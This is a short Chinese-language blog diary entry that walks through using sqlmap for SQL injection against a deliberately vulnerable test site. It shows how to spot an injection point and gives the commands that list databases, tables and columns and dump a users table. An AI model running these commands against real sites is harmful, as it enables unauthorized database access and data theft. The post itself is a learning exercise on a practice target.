是一個sql檢測工具
日記
本來是想寫bbqsql的但是昨天明明測試還好的
今天一打開卻出現錯誤...
重裝好多次
弄到最後還是modulerror QAQ
只好隨便找一個一樣是sql系列的來充數
首先,找一個專門提供測試的網站~
隨便找網站測試會被警察抓走的!!被抓走不負責!!!
之後要找注入點
就是當一個包含id的網址,當你把它後面加'
符號時會吐SQL錯誤,它就是有弱點
ex:http://testphp.vulnweb.com/artists.php?artist=1
變加上'
http://testphp.vulnweb.com/artists.php?artist=1'
在裡面輸入sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs
它就會開始跑了
看到這一行就代表選對了id
其中它跳出了兩個問題給我
第一個是發現該系統是MySQL問我是否放棄測試其他的DBSM
第二個是是否加深risk和value 越高越花時間~
可以發現他有兩個database
選擇一個進去看sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --D acuart --tables
發現有users這個項目
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --D acuart -T users --columns
可以發現裡面包含了許多項目
隨機挑一個測試就可以叫出來裡面的資料了
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C ID --dump
滿好玩的一個工具,就算沒弄懂原理也可以小小滿足一下當個skiddie的快感
參考資料:https://www.youtube.com/watch?v=OlL6IdSMImA
http://shadownull.blogspot.com/2015/08/sql-injection-tutorial.html
http://xdeath.dyndns.pro/read.php?69
https://www.ichiayi.com/wiki/tech/sqlmap
https://linuxtrack.net/viewtopic.php?id=1074